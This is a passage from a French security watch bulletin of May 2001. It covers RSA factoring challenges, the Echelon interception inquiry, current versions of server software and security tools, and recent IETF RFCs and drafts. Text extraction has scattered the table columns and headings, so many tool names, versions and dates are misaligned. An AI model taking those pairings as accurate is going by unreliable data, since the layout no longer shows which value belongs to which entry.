RSA-100
1991
NA
NA
NA
NA
1 000
RSA Security
RSA-110
1992
NA
NA
NA
NA
4 429
RSA Security
RSA-120
1993
NA
NA
NA
NA
5 898
RSA Security
RSA-129
1977
426 bits 32 sem.
NA
NA
100
RSA Security
RSA-130
1991
428 bits
NA
NA
14 527
RSA Security
RSA-140
1999
465 bits
9 sem.
8,9
6
(estimation) 17 226
RSA Security
RSA-155
1999
512 bits 30 sem.
35,7
10
(estimation)
9 383
RSA Security
En l’état actuel, il est difficile d’estimer les puissances de calcul nécessaires pour vaincre les nouveaux défis mais il est
fort probable que seuls les défis RSA-576 et RSA-640 puissent être remportés dans l’état actuel des connaissances et
de la technologie. Un article publié en 1999 par la société RSA Security a propos de Twinkle, le système de
factorisation utilisant une technologie optique imaginé par A.Shamir, précisait qu’il faudrait environ 6000 mois pour
factoriser un nombre de 768 bits à l’aide d’une machine comportant 1200 nœuds …
http://www.rsasecurity.com/rsalabs/challenges/factoring/index.html
LA
LEGISLATION
SURVEILLANCE
ECHELON
# Description
Duncan Campbell est l’auteur du rapport ‘Interception Capabilities 2000’, l’une des 5 études de
l’enquête dénommée ‘Development of surveillance technology and risk of abuse of economic
information’. La publication en Octobre 1999 de cette enquête commanditée par le comité
scientifique du Parlement Européen - le STOA - est à l’origine de la divulgation de l’existence du
système d’interception Echelon.
Dans un article intitulé «Echelon system identified as ‘legislation-free zone’ » publié le 27 Mai par le magazine
en ligne Allemand Telepolis, Duncan Campbell retrace l’historique des différentes études pilotées par l’Europe et
l’impact de celles-ci sur les échanges avec les Etats-Unis. Si l’on se réfère à cet article, le comité chargé du dossier
Echelon à la Commission Européenne devrait publier un rapport mettant en demeure les gouvernements Anglais et
Allemands de respecter les règles édictées par le Convention Européenne des Droits de l’Homme: « The draft
committee report concludes that "there would seem to be good reason ... to call on Germany and the United Kingdom
to take their obligations under the ECHR seriously and to make the authorisation of further intelligence activities by
the NSA on their territory contingent on compliance with the ECHR" ».
Il est ainsi reproché à ces deux gouvernement d’être dans l’incapacité d’éviter une utilisation abusive des stations
d’écoute étrangères présentes sur leur territoire mettant ainsi en danger la liberté des citoyens et bafouant les lois
communautaires.
Notons par ailleurs l’existence de quatre nouvelles études commissionnées en 2001 par le Parlement Européen mais
non référencées dans la liste des rapports publiés par le STOA. Ces documents, dont trois sont accessibles sur le site
de Telepolis, ont pour objectif d’affiner les résultats des premiers rapports en s’intéressant plus particulièrement à
l’impact économique :
1. Echelon and its role in COMINT (COMmunication INTelligency) : ce document, édité en Janvier 2001, propose
un état de l’art tenant compte des nouvelles informations diffusées ou acquises depuis la publication du rapport
‘Interception Capabilities 2000’ initié en 1998 et publié fin 1999. Il a pour intérêt de mettre en évidence la part de
la rumeur et des informations non confirmées dans la couverture du dossier Echelon par les médias.
2. COMINT Impact on international trade : Lui aussi édité en Janvier 2001, ce rapport propose une liste
détaillée des affaires de commerce international qui auraient pu bénéficier des services d’un service d’analyse des
communications et ce depuis 1992. Toutes les sources d’information permettant de corroborer les faits sont
détaillées. Quatre documents fac-similés détaillant la stratégie du gouvernement américain – Levelling the playing
field around the world - sont joints en annexe.
3. COMINT privacy and human rights : Cette étude vise à démontrer, documents à l’appui, que les formes
d’interception autorisées par le gouvernement Anglais et visant à protéger les droits des citoyens Américains,
Canadiens et Australiens sont en contradiction avec les lois territoriales anglaises. Ce document a amené le
Comité Européen à constater que les atteintes potentielles à la liberté et au commerce posé par un système de
type Echelon proviennent non seulement du fait qu’il s’agit d’un système d’interception extrêmement puissant
mais aussi qu’il opère depuis une vaste zone non soumise à la législation («possible threats to privacy and to
businesses posed by a system of the ECHELON type arise not only from the fact that is a particularly powerful
monitoring system, but also that it operates in a largely legislation-free area»).
http://www.heise.de/tp/english/special/ech/7753/1.html
Page 13/45
Mai 2001
LO
OG
GIIC
BR
RE
CIIE
ES
S
EL
LS
S LIIB
LES
SERVICES DE BASE
Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons
d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme
dédiée.
RESEAU
Nom
$ BIND
$ DHCP
NTP4
WU-FTP
Fonction
Ver.
Gestion de Nom (DNS)
Serveur d'adresse
Serveur de temps
Serveur de fichiers
9.1.2
3.0rc7
4.0.99k23
2.6.1
Date
Source
04/05/01
17/05/01
11/04/01
02/07/00
http://www.isc.org/products/BIND
http://www.isc.org/products/DHCP/dhcp-v3.html
http://www.eecis.udel.edu/~ntp
http://www.wu-ftpd.org
MESSAGERIE
Nom
IMAP4
POP3
$ SENDMAIL
Fonction
Ver.
Relevé courrier
Relevé courrier
Serveur de courrier
2000c
4.0
8.12.0b10
8.11.4
Fonction
Ver.
Date
Source
20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html
25/04/01 http://www.eudora.com/qpopper_general/
24/05/01 http://www.sendmail.org
24/05/01
WEB
Nom
$ APACHE
$ ModSSL
$ MySQL
SQUID
1.3.20
2.0.16b
API SSL Apache 1.3.20 2.8.4
Base SQL
3.23.38
Cache WEB
2.4s1
Serveur WEB
Date
Source
15/05/01
04/04/01
15/05/01
27/05/01
20/03/01
http://httpd.apache.org/dist
http://www.modssl.org/
http://www.mysql.com/downloads/index.html
http://www.squid-cache.org
AUTRE
Nom
$ INN
MAJORDOMO
OpenCA
$ OpenLDAP
LES
Fonction
Ver.
Gestion
Gestion
Gestion
Gestion
2.3.2
1.94.5
0.2.0-5
2.0.11
des news
des listes
de certificats
de l'annuaire
Date
Source
03/05/01
15/01/00
26/01/01
24/05/01
http://www.isc.org/products/INN
http://www.greatcircle.com/majordomo
http://www.openca.org
http://www.openldap.org
OUTILS
Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les
tableaux suivants.
LANGAGES
Nom
$ Perl
$ PHP
Fonction
Ver.
Scripting
WEB Dynamique
5.6.1
4.0.5
Date
Source
23/04/00 http://www.cpan.org/src/index.html
30/04/01 http://www.php.net
ANALYSE RESEAU
Nom
$ Big Brother
Dsniff
$ Ethereal
IP Traf
Nstreams
SamSpade
TcpDump
WinPCap
Fonction
Ver.
Visualisateur snmp
Boite à outils
Analyse multiprotocole
Statistiques IP
Générateur de règles
Boite à outils
Analyse multiprotocole
Acquisition Trame
1.8a
2.3
0.8.18
2.4.0
1.0.0
1.14
3.6.2
2.10
Date
Source
21/05/01
17/12/00
17/05/01
20/03/01
11/11/00
10/12/99
05/02/01
26/03/01
http://maclawran.ca/bb-dnld/new-dnld.html
http://www.monkey.org/~dugsong/dsniff
http://www.ethereal.com
http://cebu.mozcom.com/riker/iptraf/
http://www.hsc.fr/ressources/outils/nstreams/download/
http://www.samspade.org/ssw/
http://www.tcpdump.org/
http://netgroup-serv.polito.it/winpcap
ANALYSE DE JOURNAUX
Nom
Fonction
Ver.
Date
Source
Page 14/45
Mai 2001
$ Analog
Autobuse
$ SnortSnarf
WebAlizer
Journaux serveur http
Analyse syslog
Analyse Snort
Journaux serveur http
5.01
1.13
052301
2.01-06
10/05/01
31/01/00
23/05/01
17/10/00
http://www.analog.cx
http://www.picante.com/~gtaylor/autobuse
http://www.silicondefense.com/software/snortsnarf/
http://www.mrunix.net/webalizer/
ANALYSE DE SECURITE
Fonction
Ver.
$ curl
$ Nessus
Nmap
Nom
Analyse http et https
Vulnérabilité réseau
Pandora
$ Saint
$ Sara
Tara (tiger)
Tiger
Trinux
Vulnérabilité Netware
Vulnérabilité système
Vulnérabilité système
Boite à outils
7.7.3
1.0.8
2.53
2.54B22
4.0b2.1
3.2.4
3.4.3
2.0.9
2.2.4p1
0.8pre1
Date
Source
07/05/01
24/05/01
05/09/00
10/03/01
12/02/99
16/05/01
17/03/01
07/09/99
19/07/99
22/10/00
http://curl.haxx.se/
http://www.nessus.org
http://www.insecure.org/nmap
http://www.packetfactory.net/projects/pandora/
http://www.wwdsi.com/saint
http://www-arc.com/sara
http://www-arc.com/tara
ftp://net.tamu.edu/pub/security/TAMU/tiger
http://www.io.com/~mdfranz/trinux/boot-images/
CONFIDENTIALITE
Nom
OpenPGP
$ GPG
Fonction
Signature/Chiffrement
Signature/Chiffrement
Ver.
1.0.6
Date
Source
http://www.openpgp.org/
29/05/01 http://www.gnupg.org
CONTROLE D'ACCES
Nom
Fonction
Ver.
TCP Wrapper
Xinetd
Accès services TCP
Inetd amélioré
7.6
2.1.89p15
Date
Source
ftp://ftp.cert.org/pub/tools/tcp_wrappers
20/05/01 http://www.xinetd.org
CONTROLE D'INTEGRITE
Nom
Fonction
Ver.
Tripwire
Intégrité LINUX
2.3.47
Date
Source
15/08/00 http://www.tripwire.org/downloads/index.php
DETECTION D'INTRUSION
Nom
Fonction
Deception TK Pot de miel
Snort
IDS Système
Shadow
IDS Réseau
Ver.
19990818
1.7
1.6
Date
Source
18/08/99 http://all.net/dtk/dtk.html
05/01/01 http://www.snort.org
01/07/00 http://www.nswc.navy.mil/ISSEC/CID/
GENERATEURS DE TEST
Nom
Fonction
Ver.
Requêtes HTTP
Analyse filtres
Paquets IP
Détection d'intrusion
Sessions TCP
Paquets UDP
Requêtes HTTP
1.4.5
1.0
2.1a
1.0
1.0.1
1.2
1.4
Pre2
Nom
Fonction
Ver.
DrawBridge
IpFilter
Cooker
Sinus
PareFeu FreeBsd
Filtre datagramme
PareFeu Linux
PareFeu Linux
3.1
3.4.17
Experim.
0.1.6
Elza
FireWalk
IPSend
IDSWakeUp
TcpReplay
UdpProbe
$ Whisker
Date
Source
01/04/00
03/02/01
19/09/97
13/10/00
19/05/97
13/02/96
24/12/99
24/05/01
http://www.stoev.org/elza/project-news.html
http://www.packetfactory.net/firewalk
ftp://coombs.anu.edu.au/pub/net/misc
http://www.hsc.fr/ressources/outils/idswakeup/download/
http://www.anzen.com/research/nidsbench/
http://sites.inka.de/sites/bigred/sw/udpprobe.txt
http://www.wiretrip.net/rfp/p/doc.asp?id=21
http://www.wiretrip.net/rfp/p/doc.asp?id=21
PARE-FEUX
Date
Source
19/04/00
07/04/01
26/02/01
01/09/00
http://drawbridge.tamu.edu
http://coombs.anu.edu.au/ipfilter/ip-filter.html
http://www.linux-mandrake.com/fr/cookerdevel.php3
http://www.ifi.unizh.ch/ikm/SINUS/firewall
TUNNELS
Fonction
Ver.
Date
Source
$ CIPE
FreeSwan
http-tunnel
Nom
Pile Crypto IP (CIPE)
Pile IPSec
Encapsulation http
Pile SSL
Pile SSH 1 et 2
Pile SSH 1 autorisée
Proxy https
PlugIn SSH TeraTerm
Tunnel TCP/UDP
01/05/01
27/03/01
06/12/00
08/03/01
05/04/01
19/03/01
16/09/99
22/02/01
21/03/01
09/02/01
http://sites.inka.de/sites/bigred/devel/cipe.html
http://www.freeswan.org
http://www.nocrew.org/software/httptunnel.html
OpenSSL
$ OpenSSH
SSF
Stunnel
TTSSH
Zebedee
1.5.2
1.9
3.0.5
3.3 (dev)
0.9.6a
2.9
1.2.27.6
3.14
1.54
2.2.1
http://www.openssl.org/
http://www.openssh.com/
http://info.in2p3.fr/secur/ssf
http://www.stunnel.org
http://www.zip.com.au/~roca/ttssh.html
http://www.winton.org.uk/zebedee/
Page 15/45
Mai 2001
NO
OR
TA
RM
AN
ME
ND
ES
DA
SE
AR
RD
ET
DS
T ST
S
LES
LES
PUBLICATIONS DE L'IETF
RFC
Du 21/04/2001 au 23/05/2001, 10 RFC ont été publiés dont 3 RFC ayant trait à la
sécurité.
RFC TRAITANT DE LA SÉCURITÉ
Thème
DNS
RSVP
SOCKS
Num Date Etat Titre
3110
3097
3089
05/01 Pst
04/01 Pst
04/01 Inf
RSA/SHA-1 SIGs and RSA KEYs in the Domain Name System (DNS)
RSVP Cryptographic Authentication -- Updated Message Type Value
A SOCKS-based IPv6/IPv4 Gateway Mechanism
RFC TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ
Thème
Num Date Etat Titre
SMTP
2821
04/01 Pst
Simple Mail Transfer Protocol
AUTRES RFC
Thème
BGP
IETF
IETF
IMF
RSVP
SLP
LES
Num Date Etat Titre
3107
2800
2899
2822
2961
3111
05/01
05/01
05/01
04/01
04/01
05/01
Pst
STD
Inf
Pst
Pst
Pst
Carrying Label Information in BGP-4
Internet Official Protocol Standards
Request for Comments Summary RFC Numbers 2800-2899
Internet Message Format
RSVP Refresh Overhead Reduction Extensions
Service Location Protocol Modifications for IPv6
DRAFTS
Du 21/04/2001au 23/05/2001, 171 drafts ont été publiés: 116 drafts mis à jour, 55
nouveaux drafts, dont 7 drafts ayant directement trait à la sécurité.
NOUVEAUX DRAFTS TRAITANT DE LA SECURITE
Thème
Nom du Draft
Date Titre
DPD
OSPF
OSPF
PAGING
PPP
SSH
RSVP
draft-huang-dpd-00
draft-etienne-ospfv2-auth-flaws-00
draft-etienne-rfc2154-flaws-00
draft-mutaf-paging-security-requirements-00
draft-arkko-pppext-eap-aka-00
draft-ietf-secsh-dns-key-format-00
draft-ietf-rap-rsvp-authsession-00
09/05
09/05
04/05
07/05
17/05
10/05
30/04
A Traffic-Based Method of Detecting Dead IKE Peers
Flaws in packet's authentication of OSPFv2
OSPF with digital signature against an insider
IP Paging Security Requirements
EAP AKA Authentication
Storing SSH Host Keys in DNS
Session Authorization for RSVP
MISE A JOUR DE DRAFTS TRAITANT DE LA SECURITE
Thème
Nom du Draft
Date Titre
AAA
DIAMETER
DNS
IPCDN
IPSEC
MAP
MOBILEIP
SIP
SIP
SMIME
draft-ietf-aaa-transport-02
draft-ietf-aaa-diameter-e2e-sec-02
draft-ietf-dnsext-parent-stores-zone-keys-01
draft-ietf-ipcdn-bpiplus-mib-05
draft-ietf-ipsec-dhcp-12
draft-arkko-map-doi-02
draft-ietf-mobileip-aaa-key-05
draft-calhoun-sip-aaa-reqs-02
draft-ietf-sip-privacy-02
draft-ietf-smime-compression-04
draft-ietf-smime-rcek-03
draft-ietf-smime-seclabel-04
draft-ietf-smime-ecc-06
18/05
15/05
09/05
10/05
14/05
21/05
17/05
08/05
21/05
10/05
11/05
08/05
15/05
AAA Transport Issues
Diameter End-2-End Security Extension
Parent stores the child's zone KEYs
Management Information Base for DOCSIS Cable Modems …
DHCPv4 Configuration of IPSEC Tunnel Mode
The MAP Security Domain of Interpretation for ISAKMP
AAA Registration Keys for Mobile IP
AAA Requirements for IP Telephony/Multimedia
SIP Extensions for Caller Identity and Privacy
Compressed Data Content Type for S/MIME
Reuse of CMS Content Encryption Keys
Implementing Company Classif. Policy with the S/MIME Sec. Label
Use of ECC Algorithms in CMS
Page 16/45
Mai 2001
DRAFTS TRAITANT DE DOMAINES CONNEXES A LA SECURITE
Thème
Nom du Draft
AAA
draft-ietf-aaa-diameter-04
draft-ietf-aaa-diameter-mobileip-04
draft-ietf-aaa-diameter-nasreq-04
BGP
draft-ouldbrahim-bgpgmpls-ovpn-00
ATM
draft-ietf-bmwg-atm-term-abr-03
FRMRELAY draft-ietf-bmwg-fr-term-06
DIAMETER draft-calhoun-diameter-sun-ping-02
ETHERIP
draft-housley-etherip-02
LDAP
draft-greenblatt-dn-type-00
draft-ietf-ldapbis-filter-01
draft-ietf-ldapbis-url-01
draft-ietf-ldapext-ldap-java-api-14
draft-legg-ldapext-component-matching-01
draft-zeilenga-ldap-collective-00
draft-zeilenga-ldap-user-schema-00
draft-zeilenga-ldap-x500-locate-00
LDUP
draft-ietf-ldup-lcup-00
ISATAP
draft-ietf-ngtrans-isatap-01
PILC
draft-ietf-pilc-pep-07
POLICY
draft-ietf-policy-core-schema-11
draft-ietf-policy-qos-info-model-03
SPPI
draft-ietf-rap-signaled-priority-v2-01
draft-ietf-rap-sppi-07
SYSLOG
draft-ietf-syslog-reliable-08
draft-ietf-syslog-syslog-10
ECML
draft-ietf-trade-ecml2-req-02
VPN
draft-tsenevir-l2-req-00
L2TP
draft-vipin-l2tpext-failover-00
Date Titre
15/05
15/05
15/05
24/04
25/04
25/04
07/05
24/04
03/05
08/05
11/05
04/05
07/05
26/04
26/04
26/04
11/05
21/05
04/05
04/05
25/04
22/05
10/05
17/05
22/05
08/05
15/05
04/05
Diameter Base Protocol
Diameter Mobile IP Extensions
Diameter NASREQ Extensions
BGP/GMPLS Optical VPNs
Terminology for ATM ABR Benchmarking
Terminology for Frame Relay Benchmarking
Diameter Sun Ping Extensions
EtherIP: Tunneling Ethernet Frames in IP Datagrams
Control for requesting DN object class in LDAP
The String Representation of LDAP Search Filters
The LDAP URL Format
The Java LDAP Application Program Interface
LDAP & X.500 Component Matching Rules
LDAPv3: Collective Attributes
LDAPv3: A Collection of User Schema
Location of LDAP services using Geo-Political Naming
LDAP Client Update Protocol
Intra-Site Automatic Tunnel Addressing Protocol (ISATAP)
Perf. Enhan. Proxies Intended to Mitigate Link-Relat. Degradations
Policy Framework LDAP Core Schema
Policy Framework QoS Information Model
Signaled Preemption Priority Policy Element
Structure of Policy Provisioning Information (SPPI)
Reliable Delivery for Syslog
Syslog Protocol
ECML:Version 2 Requirements
Requirements for Network Based Layer 2 VPN
Fail over extensions for L2TP
AUTRES DRAFTS
Thème
Nom du Draft
Date Titre
3GPP2
3GPP2
ACE
AHO
APEX
draft-bradner-3gpp2-collaboration-01
07/05 3GPP2-IETF Standardization Collaboration
ATMAAL2
BASE
BGP
BTC
CDN
CONTENT
DATA
DATE
DHCP
DIFFSER
DNS
DVMRP
ECM
FAX
draft-jonsson-3gpp2-rohc-rtp-0-byte-requirements-02 01/05 3GPP2 Requirements for 0-byte ROHC IP/UDP/RTP Header Comp.
draft-ietf-idn-dunce-00
draft-korkea-aho-spatial-location-payload-00
draft-etal-apex-party-01
draft-ietf-apex-access-01
draft-ietf-apex-core-01
draft-ietf-apex-presence-01
draft-new-apex-server-00
draft-ashoka-atmaal2-mib-00
draft-josefsson-base-encoding-02
draft-chen-bgp-prefix-orf-02
draft-iab-bgparch-01
draft-ietf-idr-as4bytes-03
draft-xu-bgp-gmpls-00
draft-ietf-ippm-btc-framework-06
draft-cain-cdnp-known-request-routing-02
draft-alvestrand-content-language-01
draft-korkea-aho-spatial-dataset-01
draft-ietf-impp-datetime-02
draft-ietf-dhc-dhcpv6-18
draft-ietf-diffserv-2836bis-02
draft-ietf-diffserv-efresolve-01
draft-iab-arpa-02
draft-ietf-dnsop-hardie-shared-root-server-05
draft-ietf-idn-iptr-02
draft-ietf-idn-requirements-07
draft-skwan-utf8-dns-06
draft-ietf-idmr-dvmrp-v3-10
draft-ietf-idmr-dvmrp-v3-as-00
draft-ietf-ecm-cm-04
draft-ietf-trade-voucher-lang-01
draft-ietf-fax-gateway-options-02
draft-ietf-fax-gateway-protocol-04
draft-maeda-faxwg-terminal-mode-goals-01
draft-maeda-faxwg-terminal-mode-protocol-01
FC
draft-ietf-ips-fcencapsulation-01
draft-anil-fcip-mib-00
FRMRELAY draft-ietf-frnetmib-frmrelay-service-04
draft-ietf-frnetmib-frsi-02
24/04
21/05
16/05
07/05
07/05
07/05
10/05
08/05
04/05
26/04
09/05
09/05
23/05
26/04
14/05
24/04
21/05
15/05
25/04
09/05
26/04
21/05
26/04
17/05
23/05
08/05
17/05
17/05
14/05
17/05
22/05
22/05
08/05
08/05
08/05
26/04
01/05
01/05
A prop. for a Definitely Unencumbered New Comp [ACE] Encoding
Spatial Location Payload
The APEX Option Party Pack, Part Deux!
The APEX Access Service
The Application Exchange Core
The APEX Presence Service
APEX Endpoint Servers
Definitions of Managed Objects for ATM Adaptation Layer 2
Base Encodings
Address Prefix Based Outbound Route Filter for BGP-4
Architectural Requir. for Inter-Domain Routing in the Internet
BGP support for four-octet AS number space
A BGP/GMPLS Solution for Inter-Domain Optical Networking
A Framework for Defining Empirical Bulk Transfer Capacity Metrics
Known CDN Request-Routing Mechanisms
Content Language Headers
A Common Spatial Location Dataset
Date and Time on the Internet: Timestamps
Dynamic Host Configuration Protocol for IPv6 (DHCPv6)
Per Hop Behavior Identification Codes
A Delay Bound alternative revision of RFC2598
Management Guidelines & Operational Requir. for ('ARPA')
Distributing Authorittative Name Servers via Shared Unicast Addr.
Internationalized PTR Resource Record (IPTR)
Requirements of Internationalized Domain Names
Using the UTF-8 Character Set in the Domain Name System
Distance Vector Multicast Routing Protocol
Distance Vector Multicast Routing Protocol Applicability Statement
The Congestion Manager
XML Voucher: Generic Voucher Language
Guideline of optional services for Internet FAX Gateway
Internet FAX Gateway Functions
Goals for Terminal Mode
Protocol for Terminal Mode
FC Frame Encapsulation
FCIP Management MIB
Def. of Managed Objects for Frame Relay Service Level Definitions
Def. of Managed Objects for Circuit to Interface Translation
Page 17/45
Mai 2001
FTP
GFIBI
GMPLS
GRE
IDRM
IGMP
IMAP
IOTP
IP
IPNRG
IPSEC
IPV6
draft-ietf-ftpext-mlst-13
draft-massimo-gfibi-01
draft-ietf-ccamp-gmpls-sonet-sdh-00
draft-christian-gre-over-clnp-02
draft-irtf-idrm-handle-system-00
draft-irtf-idrm-handle-system-def-00
draft-irtf-idrm-handle-system-protocol-00
draft-ietf-idmr-igmp-mrdisc-06
draft-ietf-ngtrans-mtp-00
draft-nerenberg-imap-binary-04
draft-palme-mailext-headers-05
draft-ietf-trade-iotp-v1-errata-00
draft-draves-ipngwg-ingress-filtering-00
draft-ietf-pilc-error-07
draft-ietf-pilc-slow-06
draft-ietf-tewg-framework-04
draft-kashyap-ipoib-ipv4-and-arp-00
draft-kashyap-ipoib-ipv4-multicast-00
draft-wlai-tewg-measure-01
draft-pelissier-ipoib-encaparp-00
draft-irtf-ipnrg-arch-00
draft-etienne-ipsec-esp-ctr-mode-00
draft-blanchet-ipngwg-testadd-00
draft-thaler-ipngwg-multilink-subnets-00
draft-iesg-ipv6-addressing-recommendations-01
ISCSI
IS-IS
L2TP
LANMAR
LDAP
LDUP
LOCAL
M3UA
MAIL
MBONE
MBUS
MEGACO
MGCP
MIB
MIDCOM
MIDTAX
MIME
MMUSIC
MOBILE
MOBILEIP
MPLS
draft-ietf-ipngwg-default-addr-select-04
draft-ietf-ipngwg-router-selection-00
draft-ietf-malloc-ipv6-guide-02
draft-lutchann-ipv6-intro-00
draft-sheinwald-iscsi-crc-00
draft-hermelin-ext-lsp-frags-01
draft-ietf-isis-wg-mib-04
draft-martin-isis-admin-tags-01
draft-ietf-l2tpext-ppp-discinfo-04
draft-ietf-l2tpext-svctype-01
draft-parikh-l2tpext-failover-00
draft-ietf-manet-lanmar-01
draft-ietf-ldapbis-dn-05
draft-ietf-ldapext-ldapudp-00
draft-ietf-ldup-urp-04
draft-proberts-local-subnet-mobility-problem-01
draft-sigtran-m3ua-mib-01
draft-palme-maillist-01
draft-ietf-mboned-iana-ipv4-mcast-guidelines-02
draft-ietf-mboned-glop-extensions-02
draft-ietf-mmusic-mbus-transport-05
draft-boyle-megaco-tonepkgs-04
draft-taylor-megaco-enhalpkgs-00
draft-andreasen-mgcp-rfc2705bis-01
draft-foster-mgcp-nas-01
draft-ietf-disman-alarm-mib-02
draft-ietf-entmib-impl-check-00
draft-ietf-midcom-framework-01
draft-ietf-midcom-scenarios-02
draft-shore-midcom-apps-00
draft-carpenter-midtax-01
draft-herriot-application-multiplexed-00
draft-fairlie-mmusic-sdp-sctp-00
draft-reynolds-mobile-isp-requirements-00
draft-ietf-mobileip-3gwireless-ext-06
draft-ietf-mobileip-fast-mipv6-01
draft-ietf-mobileip-gnaie-03
draft-ietf-mobileip-hmipv6-03
draft-ietf-mobileip-lowlatency-handoffs-v4-01
draft-bala-mplamps-01
draft-dubuc-mpls-bundle-mib-02
draft-ganti-mpls-diffserv-elsp-00
draft-harrison-mpls-oam-req-00
draft-ietf-mpls-diff-ext-09
draft-ietf-mpls-generalized-cr-ldp-03
draft-ietf-mpls-generalized-rsvp-te-03
draft-ietf-mpls-generalized-signaling-04
draft-ietf-mpls-lsp-query-02
draft-ietf-mpls-tc-mib-00
draft-martini-l2circuit-encap-mpls-02
draft-martini-l2circuit-trans-mpls-06
draft-nadeau-mpls-gmpls-te-mib-00
21/05
08/05
11/05
14/05
10/05
10/05
10/05
08/05
18/05
23/05
21/05
18/05
21/05
07/05
04/05
27/04
03/05
30/04
17/05
08/05
18/05
15/05
07/05
21/05
16/05
14/05
21/05
27/04
18/05
08/05
09/05
27/04
18/05
01/05
04/05
09/05
21/05
30/04
11/05
10/05
08/05
23/05
21/05
02/05
27/04
11/05
14/05
25/04
11/05
25/04
30/04
01/05
16/05
21/05
11/05
30/04
01/05
10/05
17/05
17/05
26/04
04/05
27/04
16/05
08/05
22/05
27/04
21/05
27/04
02/05
02/05
02/05
15/05
14/05
22/05
22/05
30/04
Extensions to FTP
Guidelines for Internet Bibliographic Issues
GMPLS Extensions for SONET and SDH Control
Generic Routing Encapsulation over CLNP networks
Handle System Overview
Handle System Namespace and Service Definition
Handle System Protocol (ver 2.0) Specification
IGMP Multicast Router Discovery
An IPv6/IPv4 Multicast Translator based on IGMP/MLD Proxying
IMAP4 Binary Content Extension
Common Internet Message Header Fields
Internet Open Trading Protocol (IOTP)Version 1 Errata
Ingress Filtering, Site Multihoming, and Source Address Selection
End-to-end Performance Implications of Links with Errors
End-to-end Performance Implications of Slow Links
A Framework for Internet Traffic Engineering
IPv4 and ARP over InfiniBand networks
IPv4 multicast and broadcast over InfiniBand networks
A Framework for Internet Traffic Engineering Measurement
IP and ARP over InfiniBand(TM) Architecture
Interplanetary Internet (IPN): Architectural Definition
The counter-mode and its use with ESP
IPv6 Test Address Space Reserved for Doc. , Ex. and Priv Testing
Multi-link Subnet Support in IPv6
IAB/IESG Recommendations on IPv6 Address Allocations
Default Address Selection for IPv6
Default Router Preferences and More-Specific Routes
Dynamic Allocation Guidelines for IPv6 Multicast Addresses
A Technical Introduction to IPv6
Memo iSCSI CRC/Checksum Considerations
Ext. the Number of IS-IS LSP Fragments Beyond the 256 Limit
Management Information Base for IS-IS
Administrative Tags in IS-IS
L2TP Disconnect Cause Information
L2TP Service Type
Proposed mechanism for L2TP failover handling
Landmark Routing Protocol for Large Scale Ad Hoc Networks
LDAP v3 : UTF-8 String Representation of Distinguished Names
Lightweight Directory Access Protocol over UDP/IP
LDUP Update Reconciliation Procedures
Local Subnet Mobility Problem Statement
SS7 MTP3-User Adaptation Layer (M3UA) MIB using SMIv2
Appropriate Mailing List Behaviour
IANA Guidelines for IPv4 Multicast Address Allocation
Extended Allocations in 233/8
A Message Bus for Local Coordiantion
Supplemental Tones Packages for Megaco/H.248
Megaco/H.248 Enhanced Analog Line Packages
Media Gateway Control Protocol (MGCP) Version 1.0bis
NAS packages for MGCP
Alarm MIB
Entity MIB Implementation Checklist
Middlebox Communication Architecture and framework
MIDCOM Scenarios
Application Considerations for Midcom Middleboxes
Middle boxes: taxonomy and issues
The MIME Application/Multiplexed Content-type
Guidelines for specifying SCTP-based media transport using SDP
Mobile Internet Service Provider Reqts for a Wireless Internet F..
Mobile IP Based Micro Mobility Mgmt in The 3rd Gen. Wireless Net.
Fast Handovers for Mobile IPv6
Generalized NAI (GNAIE) Extension
Hierarchical MIPv6 mobility management
Low latency Handoffs in Mobile IPv4
MPLampS: Electricity over IP (with an MPLS control plane)
Link Bundling Management Information Base Using SMIv2
MPLS Support of Differentiated Services using E-LSP
Requirements for OAM in MPLS Networks
MPLS Support of Differentiated Services
Generalized MPLS Signaling - CR-LDP Extensions
Generalized MPLS Signaling - RSVP-TE Extensions
Generalized MPLS - Signaling Functional Description
MPLS LDP Query Message Description
Def. of Textual Conv. and OBJECT-IDENTITIES for MPLS mgmt
Encap. Methods for Transport of Layer 2 Frames Over MPLS
Transport of Layer 2 Frames Over MPLS
Extensions to the MPLS Traffic Engineering MIB in Support of …
Page 18/45
Mai 2001
MSDP
MSLP
NNI
OGG
OPTICAL
OSPF
PIM
PKIX
POLICY
PPP
PPVPN
PRINT
PROVREG
PWE3
QTP
RAP
RFC1858
RIP
RMD
ROHC
RSP
RSVP
RTP
SCTP
SDP
SDP4NAT
SEAMOBY
draft-osu-ipo-mpls-issues-02
draft-tommasi-mpls-intserv-01
draft-ietf-msdp-spec-10
draft-zhao-slp-da-interaction-10
draft-young-opt-nni-prot-issues-00
draft-walleij-ogg-mediatype-00
draft-pbh-packet-optical-escalation-01
draft-giacalone-metric-auto-decay-routing-01
draft-ietf-ospf-5to7-00
draft-ydlin-pim-sm-rp-00
draft-ietf-pkix-cmp-transport-protocols-04
draft-ietf-policy-qos-device-info-model-03
draft-ietf-policy-terminology-03
draft-tsenevir-ppp-flow-00
draft-rosen-ppvpn-l2vpn-00
draft-ietf-printmib-finishing-10
draft-ietf-provreg-dn-defn-01
draft-ietf-provreg-grrp-reqs-02
draft-ietf-pwe3-requirements-00
draft-koleyni-pwe3-atm-over-mpls-00
draft-pate-pwe3-framework-00
draft-cornish-qtp-02
draft-ietf-rap-rsvp-newidentity-02
draft-ietf-rap-session-auth-00
draft-miller-rfc1858-cmts-00
draft-ietf-rip-mib-01
draft-westberg-rmd-framework-00
draft-westberg-rmd-od-phr-00
draft-ietf-rohc-rtp-0-byte-requirements-00
draft-pelletier-rohc-rtp-llarohc-cdma2000-00
draft-ietf-rserpool-comp-00
draft-ietf-rserpool-reqts-03
draft-ietf-issll-rsvp-cap-03
draft-gentric-avt-mpeg4-multisl-04
draft-harrison-avt-rtpkeys-00
draft-ietf-avt-evrc-03
draft-ietf-avt-rtp-amr-08
draft-ietf-avt-rtp-interop-08
draft-ietf-avt-rtptest-05
draft-ietf-avt-ulp-01
draft-ietf-tsvwg-addip-sctp-00
draft-ietf-tsvwg-rfc2960-bis-00
draft-otis-record-delivery-01
draft-ietf-mmusic-sdp-new-02
draft-ietf-mmusic-sdpng-00
draft-ietf-mmusic-sdpng-req-01
draft-taylor-mmusic-sdp-tdm-00
draft-huitema-sdp4nat-00
draft-ietf-seamoby-context-transfer-problem-stat-01
draft-ietf-seamoby-paging-problem-statement-03
SEIVE
SIGTRAN
